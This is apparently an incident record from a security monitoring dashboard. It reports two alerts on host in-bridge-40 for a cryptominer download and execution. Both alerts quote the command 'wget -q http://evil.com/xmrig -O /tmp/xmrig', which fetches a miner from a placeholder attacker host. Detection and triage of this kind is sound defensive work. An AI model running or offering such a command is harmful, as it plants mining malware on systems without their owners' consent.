Back to list

Medium CINC-20251220-90E1CB0C new

Aggregate ID: aggind:af4714f04ea341d8b9ee63c7ec7ad5c9:12944303653

Incident Overview

Incident ID CINC-20251220-90E1CB0C
Severity Medium (70)
Status new
Alert Count 2
Host Count 1

Timeline

First Seen 2025-12-20 22:08:37
Last Seen 2025-12-20 22:08:37
Duration 0d 0h 0m
Created 2025-12-20 23:35
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Command and Control Execution
Techniques:
Ingress Tool Transfer Command and Scripting Interpreter

Affected Hosts (1)

in-bridge-40

Related Alerts (2)

Severity Status Hostname Description Tactic Command Line Time
High new in-bridge-40 An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected. Command and Control wget -q http://evil.com/xmrig -O /tmp/xmrig 12-20 22:08
High new in-bridge-40 A script launched with a command line that is often associated with Cryptomining software. If this is unexpected, review the process tree. Execution wget -q http://evil.com/xmrig -O /tmp/xmrig 12-20 22:08